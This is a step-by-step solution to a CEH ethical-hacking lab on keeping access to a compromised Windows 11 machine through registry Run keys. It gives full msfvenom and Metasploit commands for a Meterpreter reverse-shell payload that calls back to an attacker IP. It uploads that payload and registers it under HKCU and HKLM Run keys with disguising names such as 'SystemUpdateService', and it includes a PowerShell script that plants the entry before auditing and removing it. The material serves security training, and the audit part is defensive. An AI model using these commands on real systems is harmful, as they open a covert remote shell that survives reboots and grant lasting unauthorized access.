Lab3 Task2 RegistryPersistence Solution

This document outlines the steps to establish persistence on a compromised Windows 11 machine by modifying the registry Run keys. It details the process of generating a malicious payload, transferring it to the target machine, and configuring it to run automatically upon user login. The procedure includes using tools like Metasploit and Meterpreter to achieve the objective and verify the modifications made to the registry.

Uploaded by: tch.mustafasmadi

Lab Solution: Module 6, Lab 3, Task 2 - Maintain Persistence by Modifying Registry Run Keys

Introduction
This document details the steps to complete Task 2 of Lab 3 from Module 06 (System
Hacking) of the CEH v13 Lab Manual. The objective is to establish persistence on a
compromised Windows 11 machine by creating a malicious payload and configuring it to
run automatically upon user login using Windows Registry Run keys.

Lab Environment
• Attacker Machine: Parrot Security VM (IP: 10.10.1.13 - Example from Manual)
• Target Machine: Windows 11 VM
• Credentials: Parrot (attacker/toor)

Procedure

Step 1: Initial Setup

Ensure both the Parrot Security and Windows 11 virtual machines are powered on and
networked correctly. Log in to the Parrot Security VM using the provided credentials
(attacker/toor).

Step 2: Generate Payload for Persistence

Open a terminal window on the Parrot Security machine. Elevate privileges to root with
sudo su (password: toor) and run cd to move to root's home directory. Generate a
Meterpreter payload with msfvenom. This executable is what will later be registered under
the Run key, so that it launches on every logon and connects back to the handler
configured in Step 3.

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=4444 -f exe > /home/attacker/Desktop/registry.exe

(Note: Replace 10.10.1.13 with the actual IP address of your Parrot Security VM. The
lab manual uses LPORT 4444 for this task. Adjust the output path
/home/attacker/Desktop/registry.exe if necessary; because the command runs as root, the
file will be owned by root.)

Step 3: Setup Metasploit Handler

Launch the Metasploit Framework console ( msfconsole ). Configure a listener to
receive the connection from the persistence payload.

use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.1.13
set lport 4444
exploit -j -z
This starts the listener for the persistence payload as a background job ( -j ) without
automatically interacting with the first session that opens ( -z ), so the console stays
free for the remaining steps. The handler must still be running whenever the target user
logs on, otherwise the payload's connection attempt simply fails.

Step 4: Transfer Payload to Target

Transfer the generated registry.exe file from the Parrot VM to the Windows 11 VM.
Place it in a known, stable location that the target user can read, for example
C:\Users\Public\registry.exe . The Run key stores only a command line, so if the file
is later moved or deleted the persistence silently stops working. Methods include
hosting the file on a web server, using shared folders, or, if a Meterpreter session from
a previous compromise is already open, the upload command. If Microsoft Defender
real-time protection is enabled on the target, it will quarantine an unencoded
Meterpreter executable on write or on first execution, so confirm it is disabled in the
lab environment before continuing.

(Assuming an existing Meterpreter session (Session 1) is available)

upload /home/attacker/Desktop/registry.exe C:\\Users\\Public\\registry.exe
Step 5: Modify Registry Run Key via Meterpreter

If you have an active Meterpreter session on the target machine (let's assume Session 1),
you can use Meterpreter's reg command to modify the registry. Add a string value to the
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key whose data is
the command line to execute. Windows runs every value under this key when the current
user logs on, so registry.exe will start, with that user's privileges, at each login.

reg setval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v "MyBackdoor" -d "C:\\Users\\Public\\registry.exe"

(Note: Replace MyBackdoor with a less obvious name if desired. Ensure the -d path
matches the location where you saved registry.exe ; because the data is interpreted as a
command line, a path containing spaces must be wrapped in quotes inside the data. The
default value type written by reg setval is REG_SZ, which is what the Run key expects.)

Alternatively, if the session is running with administrative privileges (for example after
the UAC bypass in the previous lab), you can add the entry under HKEY_LOCAL_MACHINE so
it runs for every user who logs on. SYSTEM is not required, but a non-elevated session
will receive an access-denied error when writing this key:

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v "SystemUpdateService" -d "C:\\Users\\Public\\registry.exe"

Step 6: Verify Registry Modification (Optional)

Still within the Meterpreter session, query the value to confirm it was written with the
expected name and data.

reg queryval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v "MyBackdoor"

Or for HKLM:

reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v "SystemUpdateService"

You can also verify this manually on the Windows 11 machine using regedit.exe and
navigating to the respective Run key; the value should appear as type REG_SZ with the
full path to registry.exe as its data.
Step 7: Test Persistence

Restart the Windows 11 virtual machine. Log back into the user account for which the
Run key was modified (e.g., the Admin user if HKCU was used, or any user if HKLM was
used). Logging off and on again is enough to trigger the Run key; a full restart
additionally shows that the entry survives a reboot.

Switch back to the Parrot Security VM's Metasploit console where the handler for port
4444 is running. After the Windows user logs in, the registry.exe payload should
execute automatically, and a new Meterpreter session should open in your handler.

Use the sessions command to list the new session. If no session appears, check that the
handler is still running, that the target can reach 10.10.1.13 on port 4444, and that
the file referenced by the Run value still exists at that path.


Step 8: Conclusion and Cleanup

You have successfully established persistence on the target machine by adding a
malicious payload to the Windows Registry Run keys. This ensures the payload executes
automatically upon user login, granting you continued access. Document your findings.
Close all Meterpreter sessions and shut down the virtual machines.

(Optional Cleanup: To remove the persistence, use the reg deleteval command in
Meterpreter targeting the appropriate key and value name, or manually delete the entry
using regedit.exe on the target machine before shutting down. Also delete
C:\Users\Public\registry.exe itself so that no payload is left behind.)
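The following PowerShell script is an added example, not part of the CEH lab manual or of Metasploit. Run on the Windows 11 target, it reproduces the whole procedure natively (the equivalent of reg setval, reg queryval and reg deleteval from Steps 5, 6 and 8) and adds the check a defender would run: an audit of every Run/RunOnce location that flags entries whose executable is unsigned or lives in a user-writable directory. The registry paths are the standard Windows ones and the value name and payload path are the lab's; the function names and the audit heuristics are assumptions made here for illustration.

```powershell
# Added example (not from the lab manual): manage and audit Run-key persistence
# natively on the Windows 11 target. Function names and heuristics are assumptions.

$UserRun    = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$MachineRun = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
# All logon autostart keys worth auditing (RunOnce values are deleted after one run).
$RunKeys = @(
    $UserRun,
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    $MachineRun,
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

function Test-IsElevated {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Add-RunKeyEntry {
    # Equivalent of the Meterpreter "reg setval" step: writes a REG_SZ command line.
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$Command,
        [ValidateSet('User', 'Machine')][string]$Scope = 'User'
    )
    $key = if ($Scope -eq 'Machine') { $MachineRun } else { $UserRun }
    # HKLM\...\Run needs an elevated token; HKCU\...\Run is writable by the user itself.
    if ($Scope -eq 'Machine' -and -not (Test-IsElevated)) {
        throw 'Writing the HKLM Run key requires an elevated (administrator) session'
    }
    Set-ItemProperty -Path $key -Name $Name -Value $Command -Type String
    # Read it back: persistence only works if the value actually landed.
    return ((Get-ItemProperty -Path $key -Name $Name).$Name -eq $Command)
}

function Get-RunCommandExecutable {
    # Extract the executable path from a Run-key command line. A quoted path is
    # taken as-is; for an unquoted one the first whitespace-delimited token is
    # used (Windows itself also tries longer prefixes, which is skipped here).
    param([string]$Command)
    $c = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($c -match '^"([^"]+)"') { return $Matches[1] }
    if ($c -match '^(\S+)')     { return $Matches[1] }
    return $null
}

function Get-RunKeyAudit {
    # Enumerate every Run/RunOnce value and flag what Autoruns would: an executable
    # without a valid Authenticode signature, or one in a user-writable directory
    # (C:\Users\Public, where the lab drops registry.exe, is one of those).
    foreach ($key in $RunKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($prop in $item.PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }   # PSPath, PSParentPath, ... are not values
            $cmd = [string]$prop.Value
            $exe = Get-RunCommandExecutable $cmd
            $sig = if ($exe -and (Test-Path -LiteralPath $exe)) {
                (Get-AuthenticodeSignature -FilePath $exe).Status.ToString()
            } else { 'FileMissing' }
            $userWritable = [bool]($exe -match '^[a-z]:\\(Users|ProgramData|Temp|Windows\\Temp)\\')
            [pscustomobject]@{
                Key              = $key
                Name             = $prop.Name
                Command          = $cmd
                Executable       = $exe
                Signature        = $sig
                UserWritablePath = $userWritable
                Suspicious       = ($sig -ne 'Valid') -or $userWritable
            }
        }
    }
}

function Remove-RunKeyEntry {
    # Equivalent of the Meterpreter "reg deleteval" cleanup step.
    param(
        [Parameter(Mandatory)][string]$Name,
        [ValidateSet('User', 'Machine')][string]$Scope = 'User'
    )
    $key = if ($Scope -eq 'Machine') { $MachineRun } else { $UserRun }
    Remove-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
    return ($null -eq (Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue))
}

# Walk-through on the lab target: plant the entry, audit, then clean up.
Add-RunKeyEntry -Name 'MyBackdoor' -Command 'C:\Users\Public\registry.exe'
Get-RunKeyAudit | Where-Object Suspicious |
    Format-Table Key, Name, Executable, Signature, UserWritablePath -AutoSize
Remove-RunKeyEntry -Name 'MyBackdoor'
```

The audit deliberately reports both flags separately: signed binaries in user-writable paths (for example per-user installs under AppData) are common and need manual review, whereas an unsigned executable under C:\Users\Public, which is how the lab's registry.exe shows up, is the textbook indicator of this persistence technique.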

Note: Due to limitations in generating images depicting specific exploit commands or
outputs, generic placeholder images representing the relevant interfaces (terminal,
Metasploit console, Windows prompts, Registry Editor) are used below. The descriptions
accurately reflect the expected content of each screenshot.
